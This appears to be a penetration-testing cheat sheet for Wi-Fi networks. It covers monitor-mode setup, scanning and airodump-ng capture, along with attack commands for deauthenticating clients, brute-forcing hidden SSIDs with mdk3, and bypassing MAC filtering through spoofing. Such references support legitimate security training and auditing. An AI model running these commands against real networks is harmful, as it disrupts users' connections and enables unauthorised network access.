Appearance
🛜 WIFI ​
📚 Resources ​
🛠️ Tools ​
Terminologies fundamentals ​
Details
| Term | Definition |
|---|---|
| SSID | Service Set Identifier. The Wi-Fi network name visible to users. |
| BSSID | Basic Service Set Identifier. The MAC address of the access point. |
| ESSID | Extended Service Set Identifier. Usually identical to SSID; used for extended networks (roaming). |
| Beacon | Management frame sent periodically by the AP to announce its presence (SSID, BSSID, channel, security). |
| IV | Initialization Vector. Sent in cleartext with each encrypted packet. Combined with the key to generate the keystream. Essential for WEP attacks. |
Interface Management ​
Check State ​
bash
iwconfig # Show interfaces and status
iw list # Show driver capabilitiesInterface Configuration ​
bash
# Bring interface up/down
ip link set wlan0 up
ip link set wlan0 down
# Delete a virtual monitor interface
iw dev wlan0mon del
# Create a monitor interface manually
iw dev wlan0 interface add mon0 type monitorbash
airmon-ng # List interfaces and chipsets
airmon-ng check # Show interfering processes
airmon-ng check kill # Kill NetworkManager, wpa_supplicant, etc.
airmon-ng start wlan0 # Create wlan0mon (monitor mode)
airmon-ng start wlan0 6 # Start on specific channel
airmon-ng stop wlan0mon # Stop monitor modebash
# Test Injection
aireplay-ng -9 wlan0mon⚡ TX Power ​
bash
# View current region and TX power limits
iw reg get
# Change region
iw reg set US
# Set TX power (interface must be down)
iwconfig wlan0 txpower 30Scan ​
bash
iwlist wlan0 scan | grep -E 'Cell|Quality|ESSID|IEEE'Channel & Frequency ​
bash
# List available channels
iwlist wlan0 channel
# Set channel (interface must be down)
iw dev wlan0mon set channel 6
iwconfig wlan0mon channel 11
# Set frequency
iwconfig wlan0 freq "5.52G"
# Show current frequency
iwlist wlan0 frequency | grep Currentairodump-ng ​
bash
airodump-ng $interface # Start capture
airodump-ng -c 6,11 $interface # channel 6 and 11
airodump-ng --band a # a: 5GHz
airodump-ng --band bg # b: 2,4GHz (11 Mbps) | g: 2,4GHz (54 Mbps)
airodump-ng -w capture $interface # Save to fileHidden SSID Discovery ​
When ESSID = <length: 0> in airodump-ng, the SSID is hidden.
- Passive method - wait for a client to connect:
bash
airodump-ng $interface -c $channel --bssid $bssid -w capture- Active method - Deauth attack, force a client to reconnect:
bash
aireplay-ng -0 2 -a $bssid -c $client_mac $interfaceBrute-force SSID ​
bash
# Full brute-force (short SSIDs only)
mdk3 $interface p -b u -c 1 -t $bssid
# Wordlist attack
mdk3 $interface p -f /opt/wordlist.txt -t $bssid
# Character sets: u (uppercase), n (digits), a (all), c (mixed case), m (mixed+numbers)MAC Filtering Bypass ​
- Identify an authorized client MAC from airodump-ng (
STATIONcolumn) - Spoof your MAC
bash
# show current mac addr
macchanger $interface
# (Interface must be down)
macchanger -m $authorized_mac $interface- Deauth the legitimate client
bash
aireplay-ng -0 1 -a $bssid -c $authorized_mac $interfaceAircrack-ng Suite ​
bash
# Deauthentication (transverse attack)
aireplay-ng -0 <packets> -a $bssid -c $client_mac $interfacebash
# Generate graph from airodump-ng CSV
airgraph-ng -i capture-01.csv -g CAPR -o out.png
# Graph types:
# - CAPR: Client-to-AP relationship
# - CPG: Client-to-client association